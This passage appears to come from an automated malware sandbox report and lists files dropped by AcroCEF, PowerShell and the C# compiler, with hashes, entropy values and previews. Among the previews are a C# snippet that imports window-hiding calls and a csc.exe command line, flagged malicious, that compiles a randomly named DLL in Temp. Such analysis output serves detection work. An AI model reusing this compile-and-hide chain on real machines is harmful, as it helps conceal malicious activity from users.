                                                                                                                          Entropy (8bit):7.97605879016224
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24576:/YkwYIGNPQbdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07WWL07oXGZd:DwZG2b3mlind9i4ufFXpAXkrfUs0qWLk
                                                                                                                          MD5:38ED8E7B44D526DDA0F3E7608AF1AFA1
                                                                                                                          SHA1:45E30A6789382E29AC870CCF92B514FB95742C45
                                                                                                                          SHA-256:7B277E2332AE55A014D8C37CCC879D165E33315437F6197BEB153CD75E4EFBBF
                                                                                                                          SHA-512:7169B1E4B2895A91FA0FBE4297CB70BE56D733084653334BB4E8421382F8F761DAD11B5D87277E0286A7C16CB53A2C79F96BB45F433D776E82A7CF45EA25121C
                                                                                                                          Malicious:false
                                                                                                                          Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):386528
                                                                                                                          Entropy (8bit):7.9736851559892425
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                                                                                                          MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                                                                                          SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                                                                                          SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                                                                                          SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                                                                                          Malicious:false
                                                                                                                          Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y
                                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):758601
                                                                                                                          Entropy (8bit):7.98639316555857
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                                                                                                                          MD5:3A49135134665364308390AC398006F1
                                                                                                                          SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                                                                                                                          SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                                                                                                                          SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                                                                                                                          Malicious:false
                                                                                                                          Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....
                                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1419751
                                                                                                                          Entropy (8bit):7.976496077007677
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24576:/VRaWL07oXGZ4YIGNPJNdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:tRaWLxXGZ4ZGh3mlind9i4ufFXpAXkru
                                                                                                                          MD5:41034A6B023B6BB9C723DA146E190954
                                                                                                                          SHA1:22C95166FF8A1C4D2AAC25B75D804CEBAAA6ACF2
                                                                                                                          SHA-256:52BB8B0CA62248721986D650004C11ACCB0C988B6FBA645D9B4E3557CA87A15D
                                                                                                                          SHA-512:6F8CD54BBB750E32FEBD78895F433CCF0C553C56E6B7DDEA03E3EA36ED283084CF6EA6FA8999162999D184B0F04B6E6DAB7F6FC27648EE517F744D7E8DBC8AAD
                                                                                                                          Malicious:false
                                                                                                                          Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                          File Type:MSVC .res
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):652
                                                                                                                          Entropy (8bit):3.1131041089152687
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryK3ak7YnqqBgPN5Dlq5J:+RI+ycuZhNQ3akSBgPNnqX
                                                                                                                          MD5:94F5168F38BD7BF84CACF06C368C7C74
                                                                                                                          SHA1:8CCAD31A8EDA20DF4EDD770CAF354BEB3B581CA0
                                                                                                                          SHA-256:B5D227173C3C23262C853B860BA41F97E392EECD0D199F13D466720AD0EA451F
                                                                                                                          SHA-512:1A82B25AAECD82A0E728E0D62F921A80ADDF4B83D6DB1E97BD54B7CA73E799B5DAEF2630ECECB0A772CED99CA9822823D3F018DD14409566481E90B89D45DAAC
                                                                                                                          Malicious:false
                                                                                                                          Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...p.k.w.q.t.v.a.t...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...p.k.w.q.t.v.a.t...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):244
                                                                                                                          Entropy (8bit):4.952945910145069
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6:V/DssSuVY/so68SRvoSoODnso68SRaqK4Li:V/D9PY/REvoOnREfe
                                                                                                                          MD5:6E7BC02C23E28738F9898185137720DB
                                                                                                                          SHA1:F0450E92B0D01C2A0D23DEF93299FFD1512FAB46
                                                                                                                          SHA-256:80A682DC3D4FEF7A23471B441BBA682648D7373DEB9889E0017E3BBBA43754E7
                                                                                                                          SHA-512:FF24CEDAD3619B0D2379F668A06CE36A5DAFF2EBC2B11FCF8BD960C3272D99F5F77EDCA893701A6232DC9EB07794C8D2ABC3FD802CE7E5638EE87291DE1AAEFB
                                                                                                                          Malicious:false
                                                                                                                          Preview:.using System; using System.Runtime.InteropServices; public class Win32 { [DllImport("user32.dll")] public static extern int ShowWindow(IntPtr hWnd, int nCmdShow); [DllImport("user32.dll")] public static extern IntPtr GetForegroundWindow(); }
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (368), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):371
                                                                                                                          Entropy (8bit):5.230917606096982
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2923fLsSLzHUzxs7+AEszI923fLsSL9:p37Lvkmb6Kz/0WZE2/x
                                                                                                                          MD5:64C1FC358D936F3CB7C8062F94AA5BD2
                                                                                                                          SHA1:2D30E264272940B1BB3D31FEC1D8E1A743193FB7
                                                                                                                          SHA-256:729EDBC8DA7189A1E8E4EC49CBC74D13F9A368997CBA4F6F69D7F7BC3D5814CA
                                                                                                                          SHA-512:A14E65E8A6E7C3AAEB695599010608B957832F066913C8CCC41BA320AB2C2016FD86246B39F778774B6DD68D3A723A47C769F2CB7310570C4C05A6D6B4C3BF91
                                                                                                                          Malicious:true
                                                                                                                          Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\pkwqtvat\pkwqtvat.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\pkwqtvat\pkwqtvat.0.cs"
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3072
                                                                                                                          Entropy (8bit):2.794015060231172
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:etGSHmJ2JJi8R86QMBTZeetkZfxaZl3+WI+ycuZhNQ3akSBgPNnqI:6HNNR9ZIRJcH3l1ulQ3a3B4qI
                                                                                                                          MD5:6620FC5B3BEB3A4D1BF352D67379EC95
                                                                                                                          SHA1:FC5790DA0D8BA5A878ACBA58717B7BF0BFEAB1DF
                                                                                                                          SHA-256:752C859E461A2701B4CF3832DF799088A6B38E9F83AEFC6B753E0DB6812B8936
                                                                                                                          SHA-512:A0C780849B5F2BBE8CCADE3EDC5A9387849BBB3085705ACA7AD299A6D5C95DDA8F44232779EC410D3D62EA1E8B36B1E39D53D69A4F4874382D324B539EE24BBF
                                                                                                                          Malicious:false
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Ig...........!.................#... ...@....... ....................................@.................................P#..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................-.&.....g.....g.......................................... 4............ ?.....P ......S.........Y.....^...S.....S...!.S.....S.......".....+.......4.......?..................................................<Module
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (451), with CRLF, CR line terminators
                                                                                                                          Category:modified
                                                                                                                          Size (bytes):872
                                                                                                                          Entropy (8bit):5.305814603089386
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:KMoId3ka6Kz/VE2/UKax5DqBVKVrdFAMBJTH:dokka6aNE28K2DcVKdBJj
                                                                                                                          MD5:5BB59D8608BB8ED1CFFFF9DFC9875F20
                                                                                                                          SHA1:7EE4CF468C74EDECCA07E6E45751D4B387C78B63
                                                                                                                          SHA-256:91EE5449B3EAB5148BA93066A3E1EFB3D3F00A78E4AACBC4665A1538B6F89156
                                                                                                                          SHA-512:D05CE7EC0F80D0DB01D57B102A54A0516C15C8D1B66C2F4E403984DCC167980776F7FAF0D1C0B60C07B1F0593C4E2E12F04314885AEFE336F6FBCF17FFB845F1
                                                                                                                          Malicious:false
                                                                                                                          Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\pkwqtvat\pkwqtvat.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\pkwqtvat\pkwqtvat.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):6222
                                                                                                                          Entropy (8bit):3.7103469747327456
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:MgkSACKbU2K+1e/ukvhkvklCywwn2k9uClzEPSogZozE9uCl/EPSogZo/1:n1AC3oZkvhkvCCtg9uCDH/9uCXHs
                                                                                                                          MD5:BA6A5C67F6C82DA3D347845CCD0B8EE3
                                                                                                                          SHA1:82F482A96EF7FFF789B7A25648941300AA859AF4
                                                                                                                          SHA-256:3B4F1FB9202D1DA35A5AE3EA6A2357BCC26E8B61350D1DA127C11AEE66B5F05F
                                                                                                                          SHA-512:E6B515E6A4D0D921F5123D69B8C928C704791805ED7F3F021D8C2E7DF3DD5B7B8FA8B4D8DF16DF83D76D29BC890DEAB3137CBD0E743363327110649A39CAC2A1
                                                                                                                          Malicious:false
                                                                                                                          Preview:...................................FL..................F.".. ...d.........0B..z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M......N..0B...Y..0B......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl}Y.;....B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....}Y.;..Roaming.@......DWSl}Y.;....C.....................L$..R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSl}Y.;....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW.r..Windows.@......DWSl}Y.;....E.......................(.W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSl}Y.;....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSl}Y.;....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSl}Y.;....q...........
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):6222
                                                                                                                          Entropy (8bit):3.7103469747327456
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:MgkSACKbU2K+1e/ukvhkvklCywwn2k9uClzEPSogZozE9uCl/EPSogZo/1:n1AC3oZkvhkvCCtg9uCDH/9uCXHs
                                                                                                                          MD5:BA6A5C67F6C82DA3D347845CCD0B8EE3
                                                                                                                          SHA1:82F482A96EF7FFF789B7A25648941300AA859AF4
                                                                                                                          SHA-256:3B4F1FB9202D1DA35A5AE3EA6A2357BCC26E8B61350D1DA127C11AEE66B5F05F
                                                                                                                          SHA-512:E6B515E6A4D0D921F5123D69B8C928C704791805ED7F3F021D8C2E7DF3DD5B7B8FA8B4D8DF16DF83D76D29BC890DEAB3137CBD0E743363327110649A39CAC2A1
                                                                                                                          Malicious:false
                                                                                                                          Preview:...................................FL..................F.".. ...d.........0B..z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M......N..0B...Y..0B......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl}Y.;....B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....}Y.;..Roaming.@......DWSl}Y.;....C.....................L$..R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSl}Y.;....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW.r..Windows.@......DWSl}Y.;....E.......................(.W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSl}Y.;....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSl}Y.;....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSl}Y.;....q...........
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):6222
                                                                                                                          Entropy (8bit):3.7103469747327456
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:MgkSACKbU2K+1e/ukvhkvklCywwn2k9uClzEPSogZozE9uCl/EPSogZo/1:n1AC3oZkvhkvCCtg9uCDH/9uCXHs
                                                                                                                          MD5:BA6A5C67F6C82DA3D347845CCD0B8EE3
                                                                                                                          SHA1:82F482A96EF7FFF789B7A25648941300AA859AF4
                                                                                                                          SHA-256:3B4F1FB9202D1DA35A5AE3EA6A2357BCC26E8B61350D1DA127C11AEE66B5F05F
                                                                                                                          SHA-512:E6B515E6A4D0D921F5123D69B8C928C704791805ED7F3F021D8C2E7DF3DD5B7B8FA8B4D8DF16DF83D76D29BC890DEAB3137CBD0E743363327110649A39CAC2A1
                                                                                                                          Malicious:false
                                                                                                                          Preview:...................................FL..................F.".. ...d.........0B..z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M......N..0B...Y..0B......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl}Y.;....B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....}Y.;..Roaming.@......DWSl}Y.;....C.....................L$..R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSl}Y.;....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW.r..Windows.@......DWSl}Y.;....E.......................(.W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSl}Y.;....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSl}Y.;....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSl}Y.;....q...........
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):6222
                                                                                                                          Entropy (8bit):3.7136419058846393
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:YyZSACKbU2O+1e/ukvhkvklCywwn2k9uCl/EPSogZozE9uCl/EPSogZo/1:FwAC3kZkvhkvCCtg9uCXH/9uCXHs
                                                                                                                          MD5:99E12376F05F6AE98FE0101FB482950C
                                                                                                                          SHA1:A37685B6FDCC18DF8A973A42A6FDEC63BC56E62F
                                                                                                                          SHA-256:1D041EAB10002197EF92E8576160EE96BB53EFD59D377BD2D448938E36DB4163
                                                                                                                          SHA-512:5C08C21AE2F86E6B8C7577E2F0B10B8E434E9EBBE3493A18D4C9107D59C12E24E3AB36A7272D49C8CB03C9D7FC2DBD346FCE517981B19C8C54FF2F9C03A4CA52
                                                                                                                          Malicious:false
                                                                                                                          Preview:...................................FL..................F.".. ...d......!...0B..z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M......N..0B...<.0B......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl}Y.;....B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....}Y.;..Roaming.@......DWSl}Y.;....C.....................L$..R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSl}Y.;....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW.r..Windows.@......DWSl}Y.;....E.......................(.W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSl}Y.;....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSl}Y.;....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSl}Y.;....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSl}Y.;....q...........
                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                          File Type:JSON data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):55
                                                                                                                          Entropy (8bit):4.306461250274409
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                          MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                          SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                          SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                          SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                          Malicious:false
                                                                                                                          Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1472
                                                                                                                          Entropy (8bit):5.326086126988419
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:3/KySKco4KmM6GjKbmuu1o+eZN1s4RPQoUxqr9t7J0gt/NKmnerqVwFsE7W/LDh:CySU4Yymda+gs4RIoUxqr9tK8NlexsfJ
                                                                                                                          MD5:D8C551B3E835C02DAA2F00F2A5D947C8
                                                                                                                          SHA1:061B42323C00A17EB42919561B6A32B1303639FF
                                                                                                                          SHA-256:6FA76AC59CE62978A80ED6A7DD33A376DCD88BE18E092B733BE909325CE7EEC6
                                                                                                                          SHA-512:6D41A60F7902D41BC6B48EEC7C561A28C4DD9345CE724FA5D60E26344F491AC6A44E579AFA5E139B29BE59671AEA8F4FE3648E50F680E46CAAB6BE73C1682AD9
                                                                                                                          Malicious:false
                                                                                                                          Preview:@...e...........;....................................@..........L..............@T....T:M...,....;.....".Microsoft.PowerShell.LocalAccounts..H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.................0..~.J.R...L........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<................$@...J....M+.B........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Command
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):60
                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                          Malicious:false
                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):60
                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
